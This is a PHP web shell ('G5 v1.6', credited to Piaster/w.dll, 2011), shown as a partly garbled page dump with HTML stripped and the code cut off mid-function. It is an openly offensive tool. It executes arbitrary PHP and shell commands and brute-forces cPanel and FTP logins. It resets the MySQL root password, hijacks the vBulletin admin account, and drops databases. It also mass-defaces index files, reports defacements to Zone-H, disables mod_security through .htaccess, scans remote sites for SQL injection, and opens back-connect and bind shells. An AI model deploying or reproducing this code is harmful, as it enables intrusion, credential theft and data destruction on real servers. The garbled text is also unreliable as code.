G5

Dir and Files	Type	Mode	Size	Last modified	Action
".$file."	DIR	".$perm."	".$siz."	".@date ("Y/m/d, H:i:s", @filemtime($file))."	...
".$file."	".$extt."	".$perm."	".$siz."	".@date ("Y/m/d, H:i:s", @filemtime($file))."	Action
".$path."	".$file."	$extt	$siz	" . @date("d/m/Y", @filectime($dir)) . "	" . @date("d/m/Y", @filemtime($dir)) . "	$perm	view	Action

ID	User	E-mail
' . $row['userid'] . '	' . $row['username'] . '	' . $row['email'] . '

"; if (isset($_REQUEST["mkD"])) { if (file_exists(htmlspecialchars($_POST['mKd']))) {echo "Make Dir: \"".htmlspecialchars($_POST['mKd'])."\" Dir alredy exists";} elseif (!@mkdir(htmlspecialchars($_POST['mKd']),0777)) {echo "Make Dir \"".htmlspecialchars($_POST['mKd'])."\" access denied";} else {echo "Dir :".htmlspecialchars($_POST['mKd'])."Created Done"; } } if (isset($_REQUEST["mkF"])) { if (file_exists($mkfile)) {echo "Make File: \"".htmlspecialchars($_POST['mKf'])."\" File alredy exists";} elseif (!@fopen(htmlspecialchars($_POST['mKf']), "wb")) {echo "Make File: \"".htmlspecialchars($_POST['mKf'])."\" access denied";} else {echo "File:".htmlspecialchars($_POST['mKf'])."Created Done";} } if(isset($_REQUEST["chfl"])){ $ftc = htmlspecialchars($_POST['cfx']); $ftx = $_POST['cfy']; echo $ftc.$ftx; switch($_POST['ch']) { case 'cm': if(@chmod($ftc,$ftx)){echo "File: ".$ftc." CH to | ".$ftx;}else echo " dosen't exists or you don't have access";break;case 'co': if(@chown($ftc,$ftx)){echo "File: ".$ftc." CH to | ".$ftx;}else echo " dosen't exists or you don't have access";break;case 'cg': if(@chgrp($ftc,$ftx)){echo "File: ".$ftc." CH to | ".$ftx;}else echo " dosen't exists or you don't have access";break;case 'cu':if(@unlink($ftc)){echo "File: ".$ftc." Removed";}else echo " dosen't exists or you don't haveaccess";break;}} if(isset($_REQUEST["upff"])) { $ft1 = htmlspecialchars($_POST['upf']); $cod = htmlspecialchars($_POST['code']); fmas($ft1,$cod); } function fmas($dir,$codm) { $han = @fopen($dir,"w+"); @fwrite($han, $codm); if(@fclose($han)){echo "File ".$ft1." Uploaded";}else {echo "Noop!";} } switch(true){ case(oP == '7'):{ mailr_s();}break; case(oP == '9'):{ccf();}break; case(oP == '11'):{ htc();}break; case(oP =='12'):{zh();}break; case(oP =='15'):{ sear();}break; case (oP == '14'||isset($_REQUEST["crtty"])):{hashw();exit();}break; case(oPp == '3'):{rs('cfed','141','22',$st='readonly');show_users();echo "";}break; case(oPp =='5'):{ sqlinj();}break; case(oPp == '6'):{ ps5s();}break; case(oPp == '7'):{ extr_i();}break; case(isset($_REQUEST["evap"])):{ rs('cfed','141','22',$st='readonly'); $sd = stripcslashes($_POST['evac']); @eval($sd); echo "";}break; case(isset($_REQUEST["gotod"])): { rs('cmdm','141','22',$st='readonly'); $path =htmlspecialchars($_POST['goto']); $dih = @opendir($path) or die("
Permision denied! Unable to open dir $path"); if(wdll_chf())echo wdll_cmdf('dir');else htmlspecialchars(htmlspecialchars(wdll_updir($dih, $path))); echo "";}break; case(isset($_REQUEST["finds"])): {$pathh =htmlspecialchars($_POST['goto']); $fin = htmlspecialchars($_POST['fin']);echo "Find File = ".$fin."  Dir = ".$path ; rs('cmdm','141','22',$st='readonly'); $dih = @opendir($pathh) or die("
Permision denied! Unable to open dir $path"); echo wdll_nora($dih,$pathh,$fin); echo "";}break; case (isset($_REQUEST["mvdi"])):{rs('cmdm','141','22',$st='readonly'); $cop = true; $mvdir = htmlspecialchars($_POST['movd']); $dst = htmlspecialchars($_POST['destd']); if(!empty($_POST['rvm'])){$cop = false;} md($mvdir,$dst,$cop);echo ""; }break; case(isset($_REQUEST["gip"])): {echo "
SQL INJECTION FOUNDER
"; rs('cmdm','141','22',$st='readonly'); echo sqlj_do($_REQUEST["ipp"]); echo ""; echo "
Back
"; ft(); die; }break; case(isset($_REQUEST["gfil"]) || isset($_REQUEST['gfils'])|| isset($_REQUEST['show'])): {echo "
"; rs('cfed','141','22'); if($_GET['show']) {$pos = @base64_decode(htmlspecialchars($_REQUEST['show'])); if(function_exists('file_get_contents')) {echo @file_get_contents($pos);} elseif(function_exists('file')) {echo @file($pos);} elseif(function_exists('fread')){$x5 = @fopen($pos,'rw');$dc = @fread($x5,@filesize($pos));@fclose($x5);} else {rf();} echo "";inp('hidden','50','goto',path); inp('hidden','50','svdi',$pos,'','
'); sub('svff','Save',$pr='
');exit;} elseif(isset($_REQUEST['gfils'])){$pos = $HTTP_POST_VARS['cfils'];sqlf($pos);} else {$pos = $HTTP_POST_VARS['cfil'];} switch($_REQUEST['getm']){ case('1'):{{$x5 = @fopen($pos,'rw');$dc = @fread($x5,@filesize($pos));@fclose($x5);echo $dc;}}break; case('2'):{echo rf();}break; case('3'):{if(function_exists('file_get_contents')){echo @file_get_contents($pos);}}break;} echo ""; inp('hidden','50','goto',path); inp('hidden','50','svdi',$pos,'','
'); sub('svff','Save',$pr='
');}break; case(isset($_REQUEST['cmdr'])):{ rs('cmdm','141','22',$st='readonly'); $pos = $_POST['cmde']; echo wdll_cmdf($pos); echo "";}break; case(isset($_REQUEST['aliA'])) :{ $alis = $_REQUEST['alI']; define('dir',$alis); echo "Command: ".$alis."
"; rs('cmdm','141','22',$st='readonly'); echo wdll_cmdf($alis); echo "";}break; case(isset($_REQUEST['spots'])):{ rs('cmdm','141','22',$st='readonly'); ps(); echo ""; echo "
Back
"; ft(); die;}break; case(isset($_REQUEST['crcf'])):{if(!curc())die("Curl Not Avilable on this Server Can.t complete opration!");else{ $prt=$_REQUEST['port']; $us=$_REQUEST['uses']; $pa=$_REQUEST['pass']; $sit=$_REQUEST['site']; $crt=$_REQUEST['crt']; if($crt == ""){echo "\nERORR: Chois Crack Type Cpanel OR FTP ?\n"; echo "Back";die;} echo "Crack Type: ".$_REQUEST['crt']."\n[~] Cracking Process Started, Please Wait ...\n"; rs('cmds','141','22',$st='readonly'); $us=explode("\n",$us); $pa=explode("\n",$pa); echo "Crack Type: ".$_REQUEST['crt']."\n[~] Cracking Process Started, Please Wait ...\n"; if($sit == ""){$sit = "localhost";} if($prt == ""){$prt = "2082";} foreach ($us as $u){$usr = trim($u); foreach ($pa as $p ){$pwd = trim($p); if($crt == "FTP"){echo fc($sit,$usr,$pwd,$tl);} if ($crt == "Cpanel"){echo cc($sit,$prt,$usr,$pwd,$tl);}}} echo "\n[~] Cracking Process Done!\n"; echo "";unset($crcf);}}break; case(isset($_REQUEST['dhtc'])):{ $ctc = htmlspecialchars($_POST['htc']); $clc = htmlspecialchars($_POST['mhtc']); rs('cmds','141','22',$st='readonly'); switch($_REQUEST['htcc']){ case('ch'):{$hd = @fopen(".htaccess","w+");@fwrite($hd,$clc);if(@fclose($hd)){echo "[+] Htaccess Created!";}}break; case('cpp'):{$hd = @fopen(".htaccess","w+");@fwrite($hd,"AddType application/x-httpd-php4 .php");if(@fclose($hd)){echo "[+] Htaccess Created!";}}break; case('cpe'):{$hd = @fopen(".htaccess","w+");@fwrite($hd,"\r\nSetHandler application/x-httpd-php\r\n");if(@fclose($hd)){echo "[+] Htaccess Created!";}}break; case('cre'):{$hd = @fopen(".htaccess","w+");@fwrite($hd,"Options ExecCGI\r\nAddType application/x-httpd-cgi .$ctc\r\nAddHandler cgi-script .".$ctc);if(fclose($hd)){echo "[+] Htaccess Created!";}}break; case('fis'):{$hd = @fopen(".htaccess","w+");@fwrite($hd,"\r\nSecFilterEngine Off\r\nSecFilterScanPOST Off\r\n");if(fclose($hd)){echo "[+] Htaccess Created!";}}break; case('cpi'):{$hd = @fopen("php.ini","w+");@fwrite($hd,$clc);if(@fclose($hd)){echo "[+] PHP.ini Created!";}}break;} echo "";unset($dhtc);}break; case(isset($_REQUEST['zhsd'])): {rs('cmds','141','18',$st='readonly'); if(!curc())die("Curl Not Avilable on this Server Can.t complete opration!");else{ $hnam = htmlspecialchars($_POST['hname']); $htype = htmlspecialchars($_POST['htype']); $hwhy = htmlspecialchars($_POST['hwhy']); $hsts = htmlspecialchars($_POST['sts']); $hdo= explode("\n", $hsts); foreach ($hdo as $uu){$sitss = trim($uu); echo zhsr($hnam,$htype,$hwhy,$sitss);} }echo "";unset($zhsd);}break; case (isset($_REQUEST["ext_si"])) : { rs('cmds','141','22',$st='readonly'); extr_si(); echo ""; echo "

Home| |Back
";ft();exit();}break; case (isset($_REQUEST['urlup'])): {rs('cmds','141','22',$st='readonly'); $url = htmlspecialchars($_POST['urlf']); $file = htmlspecialchars($_POST['localf']); $pathf = htmlspecialchars($_POST['pathf']); if(fetchFilef($url,$pathf,$file)) {echo "[+]Uploaded file saved as ". path.'/'.$file;}else {echo "[+] Check the directory permissions for (must be 777)!\nor \nCheck URL!";} echo "";unset($urlup);}break; case(isset($_REQUEST['crypfl'])||isset($_REQUEST['crypo'])): {rs('ccrt' ,'141','22',$st=''); if(isset($_REQUEST['crypo'])) $file=@fopen($_FILES['userfile']['tmp_name'],"r") or die ("[-]Error reading file!"); $meth=$_POST['crypt'];if ($meth=="1") {echo stripcslashes(md5(@fread($file,100000)));} elseif ($meth=="2") {echo stripcslashes(crypt(@fread($file,100000)));} elseif ($meth=="3") {echo stripcslashes(sha1(@fread($file,100000)));} elseif ($meth=="4") {echo stripcslashes(crc32(@fread($file,100000)));} elseif ($meth=="5") {echo stripcslashes(urlencode(@fread($file,100000)));} elseif ($meth=="6") {echo stripcslashes(urldecode(@fread($file,100000)));} elseif ($meth=="7") {echo stripcslashes(@base64_encode(@fread($file,100000)));} elseif ($meth=="8") {echo stripcslashes(@base64_decode(@fread($file,100000)));} echo "
";echo '
File:

md5();
crypt();
sha1();
crc32();
urlencode();
urldecode();
base64_encode();
base64_decode();
';echo "

Back";echo "
Home
"; exit; }break; case(oP == '8'):{ indexc();exit();}break; case(oPp == '1'):{ vbsql();exit();}break; case(oPp == '2'):{ backc();}break; case(oPp == '4' || $_REQUEST['piasS']):{ if($win) { define('STDIN',@fopen("php://stdin","r")); $input = trim(@fgets(STDIN,256)); $input = ereg_replace('\"', "\\\"", $input); $input = ereg_replace('\'', "\'", $input); echo "| |Home
"; if(wdll_chf()) wdll_cmdf("net stop mysql"); if(wdll_chf()) wdll_cmdf('start /b C:\AppServ\MySQL\bin\mysqld-nt.exe --skip-grant-tables --user=root'); if(wdll_chf()) wdll_cmdf("C:\AppServ\MySQL\bin\mysql -e \"update mysql.user set PASSWORD=PASSWORD('piaster') where user = 'root';\""); if(wdll_chf()) {wdll_cmdf("C:\AppServ\MySQL\bin\mysqladmin -u root shutdown"); echo '
Please wait ................................... Goodluck ...Win phpMyAdmin Hacked ::
USER: root & PASSWORD: piaster

Back';}else echo " I think function disable or Path: 'C:\AppServ\MySQL ' not found on this server edit Path..Bug only in AppServ about www.appservnetwork.com"; sleep(3); if(wdll_chf()) wdll_cmdf("net start mysql");} if(!$win) { echo ''; inp('input','20','dbu',$_REQUEST['dbu'],$ti='user',$pr=''); inp('input','20','dbp',$_REQUEST['dbp'],$ti='password',$pr=''); inp('input','20','dbh',$_REQUEST['dbh'],$ti='host',$pr=''); sub('piasS','GO',$pr=''); echo '
'; if(isset($_REQUEST['piasS'])){ $dbu = $_REQUEST['dbu']; $dbp = $_REQUEST['dbp']; $dbh = $_REQUEST['dbh']? $_REQUEST['dbh'] : 'localhost'; $conn = @mysql_connect($dbh, $dbu, $dbp); $select = @mysql_select_db('mysql', $conn); if (!$select) { echo @mysql_error();} $t1 = "UPDATE mysql.user set PASSWORD=PASSWORD('piaster') where user = 'root';"; $go1 = @mysql_query( $t1 , $conn); if($go1){echo '
Goodluck ... Lunix phpMyAdmin Hacked :: Now Wait Until Mysql Restart and Come back with USER: root & PASSWORD: piaster

Back
'; echo "| |Home";} }}exit();}break; case(isset($_REQUEST['vbsq'])):{ vb_opt();exit();}break; case(oP == 6):{ //echo "
"; rs('cmds','120','20',$st='readonly'); if(wdll_chf()){ if(!$win){echo wdll_cmdf('ls -la');}else echo wdll_cmdf('dir');}else {$dih = @opendir(path) or die("
Permision denied! Unable to open dir $path"); wdll_updir($dih, path);} echo ""; }break; default:{echo " Hello
I hope you will find useful tool to perform your job properly
Also heal myself if your use of it in harm to people
Always remember
Easy Come Easy Go.
Piaster 2011 v1.6
";}//--------------------------------- } echo " "; if($_REQUEST['wbp']){bbc($_REQUEST['wbcp']);} if($_REQUEST['lbg']){bbc($_REQUEST['lbcp']);} if($_REQUEST['bpg'] ){bbc($_REQUEST['bcpo'],$_REQUEST['bcip']);} echo "
" ;sl(); echo "

"; echo "
"; //echo "
"; cm_ge(); echo " "; //echo "
"; cm_gee();echo "
";echo "
"; if (oP == '13' || !empty($_POST['evac'])) {echo eva();} else db_lg() ;echo "
";urlp();echo "

"; movdr(); echo "
"; echo ""; function mailr_s(){ echo "
"; inp('text','30','mnam',$_REQUEST['mnam'],'Your name: ',''); inp('text','30','mmail',$_REQUEST['mmail'],'Your e-mail: ',''); inp('text','30','mito',$_REQUEST['mito'],'To: ',''); inp('text','30','msubj',$_REQUEST['msubj'],'Subject: ','
'); are('mmsg',$_REQUEST['mmsg'],'80','8',$st ='',$pr ='

'); sub('mSendm','Send');} function sear(){ echo "

"; echo 'Path
'; inp('text','63','serdir',path,'','
'); echo '
'; echo 'Search DIR
'; inp('text','32','sedir','include','','
'); inp('radio','10','sea','cedr','Directory only','
'); echo '
'; echo '
Key word'; are('searcc','','60','5',$pr ='
',$id=''); echo '
'; inp('radio','10','sea','cepr','Preg_Match (Regular expressions)(into file)','
'); inp('radio','10','sea','cewo','words only (into file)','
'); inp('radio','10','sea','cefn','File Name (same key word ex: config.php)','
'); inp('radio','10','sea','cefi','File Name (include yo key word)(min char = 3)','
');// inp('radio','10','sea','cefm','File Mode (like 666 ,777 ...etc)','
'); inp('radio','10','sea','ceft','File Type (like php,txt ...etc)','

'); echo '
'; sub('search','Search'); echo '
'; echo "
Home
Back
"; ft(); die;} function hashw() { $crtf = $_POST['crrt'];echo "
"; are('crrt',stripcslashes($crtf),'80','8','
',$id='');echo "

";echo '";echo '";echo '";echo '";echo '";echo '";echo '';echo "";echo '";echo '';echo '

'; echo '';echo "";echo '
md5: '; inp('text','80','cc',stripcslashes(@md5($crtf)),'','
');echo "
crypt: '; inp('text','80','cc',stripcslashes(@crypt($crtf)),'','
');echo "
sha1: '; inp('text','80','cc',stripcslashes(@sha1($crtf)),'','
'); echo "
crc32: '; inp('text','80','cc',stripcslashes(@crc32($crtf)),'','
'); echo "
urlencode: '; inp('text','80','cc',stripcslashes(@urlencode($crtf)),'','
'); echo "
urldecode: '; inp('text','80','cc',stripcslashes(@urldecode($crtf)),'','
');echo "
base64_encode: '; inp('text','80','cc',stripcslashes(@base64_encode($crtf)),'','
'); echo '
base64_decode: '; inp('text','80','cc',stripcslashes(@base64_decode($_POST['crrt'])),'','
'); echo "
dec2hex: '; $c = strlen($crtf); for($i=0;$i<$c;$i++) { $hex = dechex(ord($crtf[$i])); if ($crtf[$i] == "&") {echo $crtf[$i];} elseif ($crtf[$i] != "\\") {echo "%".$hex;}} echo '
'; sub('crtty','Crypt','');echo '     ';sub('crypfl','Crypt File');echo '

'; echo "Back
";echo "
Home
";} function extr_i(){ echo ""; inp('text','50','sqtid','','IP/HOST:'); sub('ext_si','Extract!','
'); echo ""; } function indexc() {$xq = 'UPDATE "dbname".template name SET template name = "index code" WHERE title = "field title"'; echo "

Index Code"; are('coded','Post your code here','50','20','
'); echo '
'; echo "File Options
"; inp('text','40','masdr',path,'Path');echo '  ';inp('text','20','skid','Dir name','Skip Dir');echo "
"; inp('radio','10','msi','msfi','Just indexes','
'); inp('radio','10','msi','msfa','all files','
'); inp('radio','10','msi','msfr','Remove all without indexes'); echo "
DataBase options
"; echo "
"; inp('radio','10','msi','msvb','VB','
'); inp('radio','10','msi','msbb','MyBB','
'); inp('radio','10','msi','msin','Infinty','
'); inp('radio','10','msi','mswp','WordPress','
'); inp('radio','10','msi','msjo','Jomla','
'); inp('radio','10','msi','msrd','Remove DB!','
'); inp('radio','10','msi','msot','Other | index code = $coded','
'); inp('text','100','msqur',$xq,'Query:');echo "

"; inp('text','15','sqdbn',$n,'DBname:'); inp('text','15','sqlog',$u,'DBuser:'); inp('text','15','sqpwd',$p,'DB_PWD:'); inp('text','13','sqsrv','localhost','HOST:'); inp('text','13','sqprt','3306','PORT:'); echo "

"; sub('massa','Mass Index!','
'); echo ""; echo "Home

";exit;} function sqlinj(){ echo "FIND SQL INJECTION ON OTHER REMOTE SERVER
"; echo "
"; inp('text','20','ipp','',' IP ','

'); sub('gip',' Find SQL Inj','
'); echo "
"; } function ccf(){ $wrdlist= "1234556 \n987654321\n963852741\n321654\n987654321\n963741\n951753\n852654\n987321\n321987951753"; if(wdll_chf()){$userlist = wdll_cmdf('ls /var/mail');}else $userlist ="users"; echo "

"; $loca = $_SERVER['SERVER_NAME']; inp('text','30','site',$loca,'HOST/IP'); inp('text','5','port','2082','Port','
'); if(!empty($_REQUEST['uses'])){ $userlist = $_REQUEST['uses'];} echo "
"; are('uses',$userlist,'10','20',$pr ='');echo " "; if(!empty($_REQUEST['pass'])){$wrdlist = $_REQUEST['pass'];}echo " "; echo "".$wrdlist.""; echo "
"; echo "
Password Number : 0
Split The Password List By:
"; echo "

"; inp('radio','10','crt','cp','Cpanel [2082]'); inp('radio','10','crt','FTP','FTP [21]','
'); echo "
"; sub('crcf','Crack'); echo ""; echo "
Home

"; ?> "; inp('text','20','bcip',$_SERVER['REMOTE_ADDR'],'IP:'); inp('text','10','bcpo','1985','Port'); sub('bpg','Connect!','

'); echo 'Lunix Bind Port
'; inp('text','10','lbcp','1985','Port'); sub('lbg','Connect!','

'); echo 'Win Bind Port
'; inp('text','10','wbcp','1985','Port'); sub('wbp','Connect!'); echo ""; echo "
Back

";} function urlp(){ echo "
"; inp('text','50','urlf','http://www.','URL:'); inp('text','50','pathf',path,'Path'); inp('text','10','localf','wdll.zip','Save as'); sub('urlup','Upload!'); echo "
";} function ps5s(){ echo "
"; inp('text','30','hot','IP/Domain'); inp('text','8','spot','1','FROM'); inp('text','8','epot','100','TO'); sub('spots','Scan'); echo "
"; } function ch() { echo "";inp('text','44','cfx',path);inp('text','8','cfy','0666');sub('chfl','Ok');} function movdr(){ echo "
"; inp('checkbox','','rvm','remov','Remove dir after copy'); inp('text','50','movd',path,'FROM');inp('text','47','destd',path,'TO'); sub('mvdi','Move');echo "
"; echo "";} function eva() {echo "
"; $valo = '//unlink G5.php'; are('evac',$valo,'125','5',$st ='',$pr ='

'); sub('evap','Run PHP Code',$pr='
');echo "
";} function sk_ju() {inp('checkbox','50','Ski','Ski','Skip'); inp('checkbox','50','Jum','Jum','Jump'); inp('text','20','askid','uploads','DIR');} function cm_ge() {$aliss = ''; $aliss = dir; echo "
"; echo ""; echo ""; echo ""; echo ""; echo "
Execute "; inp('text','55','cmde',$aliss,'');sub('cmdr','CMD',$pr='
');echo "
Get File "; echo""; if(isset($HTTP_POST_VARS['cfil']))$oop = $_POST['cfil'];else $oop = path; inp('text','42','cfil',$oop,'');sub('gfil',' Get ','
');echo "
Go Dir "; inp('text','55','goto',path,'');sub('gotod',' Go ','
');echo "
Locate "; inp('text','55','fin','config.php','');sub('find','Find');echo "
Upload "; inp('hidden','55','MAX_FILE_SIZE',$umf,''); echo ""; sub('upcom','  Up ','
');echo "
";} function cm_gee() {echo ""; echo ""; echo ""; echo ""; echo ""; echo "
MK Dir "; inp('text','55','mKd',path,'');sub('mkD',' MKD ',$pr='
');echo "
MK File "; inp('text','55','mKf',path,'');sub('mkF',' MKF ','
');echo "
Download "; inp('text','55','dWn',path,'');sub('dWNf','down','
');echo "
File options "; ch();echo "
Execute "; alias(); echo "

";} function zh() {echo "

"; echo "Defacer?
"; inp('text','30','hname','w.dll','','
'); echo "Hacking Mode?
"; echo "Hacking Reason?
"; echo "
"; are('sts',@getenv("SERVER_NAME"),'30','10',$pr =''); echo '
'; sub('zhsd','Zone-H!');echo "
"; echo "

Home

";exit;} function htc(){ echo"

"; inp('text','5','htc','wdll','TO'); echo '
'; are('mhtc','Code here','40','5',$pr =''); sub('dhtc','Make!'); echo "

"; echo "Back

";exit;} function alias() {echo "
"; sub('aliA','Run '); echo "
"; } function db_lg() { echo $query=$_REQUEST['sqquery']; echo "
"; echo "
"; $n = 'mysql'; $u = 'User Name'; $p = 'Password'; if(!empty($_POST['sqdbn'])){$n = $db;} if(!empty($_POST['sqlog'])){$u = $user;} if(!empty($_POST['sqpwd'])){$p = $pass;} echo ""; inp('text','19','sqdbn',$n); inp('text','19','sqlog',$u); inp('text','18','sqpwd',$p); inp('text','15','sqsrv','localhost'); inp('text','15','sqprt','3306'); sub('sqlwxp','SQL Explorer'); are('sqquery',("SHOW DATABASES"),'100','5','
'); sub('sqconf','Run SQL Query'); echo ""; echo $rs;} function inp($ty,$sz,$nm,$vu,$ti='',$pr='') {if($ty == 'radio' || $ty == 'checkbox'){$tit = $ti; $tt = ' '.$tit.' ';unset($ti);} $inp = "$ti<input type=".$ty." name=".$nm." ";if($sz != 0) { $inp .= "size=".$sz." "; }$inp .= "value=\"".$vu."\">$tt".$pr."";echo $inp;} function sub($cnm,$cvu,$pr='') {$sub = "<input type=\"submit\" value=\"".$cvu."\" name=\"".$cnm."\" />$pr";echo $sub;} function are($anm,$avu,$col,$row,$pr ='') {$are = "<br><textarea name=\"".$anm."\" cols=\"".$col."\" rows=\"".$row."\" $sr>".$avu."
";echo $are;} function sl() {$selhk = " "; echo $selhk; } function icod() {echo "

Upload File"; are('code','Post your code here','50','20','
'); inp('text','40','upf',path,'File Name');echo "
"; sub('upff','upload','
'); echo "Back
";} function wdll_bdx($colr) {echo "

";} function wdll_bdy() {echo "
";} function wdll_repxl(){echo ("\n\n");} function wdll_repxt($file){$siz = wdll_s1z(@filesize($file));$perm = substr(decoct(@fileperms($file)), -3, 3); echo "";} function wdll_repxtr($file){ $xtr = @pathinfo($file);$extt = $xtr["extension"];$siz = wdll_s1z(@filesize($file));$perm = substr(decoct(@fileperms($file)), -3, 3); echo "";} function head($col4) { $x5 = ""; $x4 = ""; if(style == 'x5') {$style = $x5;} elseif(style == 'x4'){$style = $x4;} echo "G5
G5 v1.6
"; echo $style; echo "";} function check_url($url,$source){ //Thanks Lagripe-Dz if (preg_match("/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch_row()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i",$source)) { echo "[+] Found -> ".$url."\n"; } else{ echo "[~] Not Found -> ".$url."\n"; } } function check_sql_inj($site){ $result = @file_get_contents("$site%27"); check_url($site,$result);} function mystripos($haystack, $needle){ return strpos($haystack, stristr( $haystack, $needle ));} function sec($ent) {$bb = str_replace("http://", "", $ent); $cc = str_replace("www.", "", $bb); $dd = substr($cc, 0, mystripos($cc, "/")); return $dd; } function ft() { echo "

w.dll@live.com 2011 | Site
";} function wdll_rep($dir, $path, $file) { $lf = @filemtime($dir); $time = @date("d/m/Y", $lf); $xtr = @pathinfo($file); $extt = $xtr["extension"]; $siz = wdll_s1z(@filesize($dir)); $perm = substr(decoct(@fileperms($dir)), -3, 3); $webpath = @getenv("SERVER_NAME"); $fullp = $webpath.'/'.$dir; echo ("");} function wdll_repx() {echo ("
Dir and Files Type Mode Size Last modified Action
".$file." DIR ".$perm." ".$siz." ".@date ("Y/m/d, H:i:s", @filemtime($file))." ...
".$file." ".$extt." ".$perm." ".$siz." ".@date ("Y/m/d, H:i:s", @filemtime($file))." Action
".$path." ".$file." $extt $siz " . @date("d/m/Y", @filectime($dir)) . " " . @date("d/m/Y", @filemtime($dir)) . " $perm view Action
\n\n");} function vb_opt() { global $log,$db; $tbl= $_POST['tab1']; $odbs= $_POST['odb']; if (!$log){echo 'Could not connect: ' . @mysql_error();} echo "Login DB Done\n..."; switch ($_REQUEST["vbss"]){ case 'vbca': { $vb_wdl = 'UPDATE '.$db.'.user SET username = "wdll",password = "691fed95cba5e31004e7072abd5e98db",salt = "fdd" WHERE user.userid =1 LIMIT 1 '; $qry = @mysql_query($vb_wdl,$log); if ($qry) { echo "Runing Work ...\n"; } if(@@mysql_affected_rows($log) != 1) {echo "Done \nUser Name: wdll \nPassword: nora\n..... Enjoy.";} } break; case 'vbgm': { $vb_wdl = 'SELECT * FROM user ;'; $qry = @mysql_query($vb_wdl , $log); echo'
Dir Filename Type Size Inode Modify Mode link Action
'; while ($row = @mysql_fetch_array($qry)) {echo'';} echo "
ID User E-mail
' . $row['userid'] . ' ' . $row['username'] . ' ' . $row['email'] . '
Total : [".@mysql_num_rows($qry)."]

"; @mysql_free_result($qry); @mysql_close($log);} break; case 'vbro': { $vb_wdl = 'DROP DATABASE '.$odbs.''; $qry = @mysql_query($vb_wdl ,$log);if($qry) {echo "WORK! Done :)....
DATABASE '$odbs' GONE AWAY ^_^";}else {echo '..... Nothing To DO ...*_*';@mysql_close($log);} } break; case 'vbrb': { $vb_wdl = 'DROP DATABASE '.$db.''; $qry = @mysql_query($vb_wdl, $log);if($qry) {echo "WORK! Done :)....
DATABASE '$db' GONE AWAY ^_^";}else {echo '.....Nope ... *_*';@mysql_close($log);} } break; case 'vbrt': { $vb_wdl = 'DROP TABLE '.$tbl.' '; $qry = @mysql_query($vb_wdl , $log);if($qry) {echo "WORK! Done :)....
TABLE '$tbl' GONE AWAY ^_^";}else {echo '.....Nope ... *_*';@mysql_close($log);}} break; } echo "
Back
"; } function sqlj_do($ip){ // Thanks Lagripe-Dz $npages = 500000; $npage = 1; $allLinks = array(); while($npage <= $npages) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, 'http://www.bing.com/search?q=ip%3A' . $ip . '+id=&first=' . $npage); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_REFERER, 'http://www.bing.com/'); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8'); $result['EXE'] = curl_exec($ch); $result['ERR'] = curl_error($ch); curl_close($ch); if ( empty( $result['ERR'] ) ) {preg_match_all('(
.*
.*(.*).*
.*
)siU', $result['EXE'], $findlink); for ($i = 0; $i < count($findlink[1]); $i++) array_push($allLinks,$findlink[1][$i]); $npage = $npage + 10; if (preg_match('(first=' . $npage . '&)siU', $result['EXE'], $linksuiv) == 0) break;} else break;} $allDmns = array(); foreach ($allLinks as $kk => $vv){ $allDmns[] = $vv; } $resultPages = array_unique($allDmns); sort($resultPages) ; for ($x = 0; $x < count($resultPages); $x++){ $h3h3 = $resultPages[$x]; check_sql_inj($h3h3); } echo "\nINFO / IP : ".$ip." / Total Domain Scaned : ".count($resultPages)."\nFINISHED ";} //------------------------------------Thanx Itsec Team |ADAPTED|------------------------------------------- function sqlexp(){ global $log; if(!empty($_REQUEST['sqsrv']) && !empty($_REQUEST['sqlog']) && isset($_REQUEST['sqpwd']) && !empty($_REQUEST['sqquery'])) {$sqlserv=$_REQUEST['sqsrv'];$sqlty=$_REQUEST['sqlty'];$pass=$_REQUEST['sqpwd'];$user=$_REQUEST['sqlog'];$query=$_REQUEST['sqquery']; $db=(empty($_REQUEST['sqdbn']))?'':$_REQUEST['sqdbn']; $_SESSION[sqlserv]=$_REQUEST['sqsrv'];$_SESSION[sqlty]=$_REQUEST['sqlty'];$_SESSION[qpwd]=$_REQUEST['sqpwd'];$_SESSION[userr]=$user;} if (isset ($_GET['select_db'])){$getdb=$_GET['select_db'];$_SESSION[db]=$getdb;$query="SHOW TABLES";$res=sqlqu($_SESSION[sqlty],$_SESSION[sqlserv],$_SESSION[userr],$_SESSION[qpwd],$_SESSION[db],$query);} elseif (isset ($_GET[select_tbl])){$tbl=$_GET[select_tbl];$_SESSION[tbl]=$tbl; $query="SELECT * FROM `$tbl`";$res=sqlqu($_SESSION[sqlty],$_SESSION[sqlserv],$_SESSION[userr],$_SESSION[qpwd],$_SESSION[db],$query);} elseif (isset ($_GET[drop_db])){ $getdb=$_GET[drop_db];$_SESSION[db]=$getdb;$query="DROP DATABASE `$getdb`"; sqlqu($_SESSION[sqlty],$_SESSION[sqlserv],$_SESSION[userr],$_SESSION[qpwd],'',$query); $res=sqlqu($_SESSION[sqlty],$_SESSION[sqlserv],$_SESSION[userr],$_SESSION[qpwd],'','SHOW DATABASES');} elseif (isset ($_GET[drop_tbl])){$getbl=$_GET[drop_tbl];$query="DROP TABLE `$getbl`"; sqlqu($_SESSION[sqlty],$_SESSION[sqlserv],$_SESSION[userr],$_SESSION[qpwd],$_SESSION[db],$query); $res=sqlqu($_SESSION[sqlty],$_SESSION[sqlserv],$_SESSION[userr],$_SESSION[qpwd],$_SESSION[db],'SHOW TABLES');} elseif (isset ($_GET[drop_row])){$getrow=$_GET[drop_row];$getclm=$_GET[clm];$query="DELETE FROM `$_SESSION[tbl]` WHERE $getclm='$getrow'";$tbl=$_SESSION[tbl]; sqlqu($_SESSION[sqlty],$_SESSION[sqlserv],$_SESSION[userr],$_SESSION[qpwd],$_SESSION[db],$query); $res=sqlqu($_SESSION[sqlty],$_SESSION[sqlserv],$_SESSION[userr],$_SESSION[qpwd],$_SESSION[db],"SELECT * FROM `$tbl`");} else$res=sqlqu($sqlty,$sqlserv,$user,$pass,$db,$query); if($res){$res=htmlspecialchars($res);$row=array ();$title=explode('*',$res);$trow=explode('-',$title[1]);$row=explode('-+',$title[0]);$data=array();$field=$trow[count($trow)-2]; if 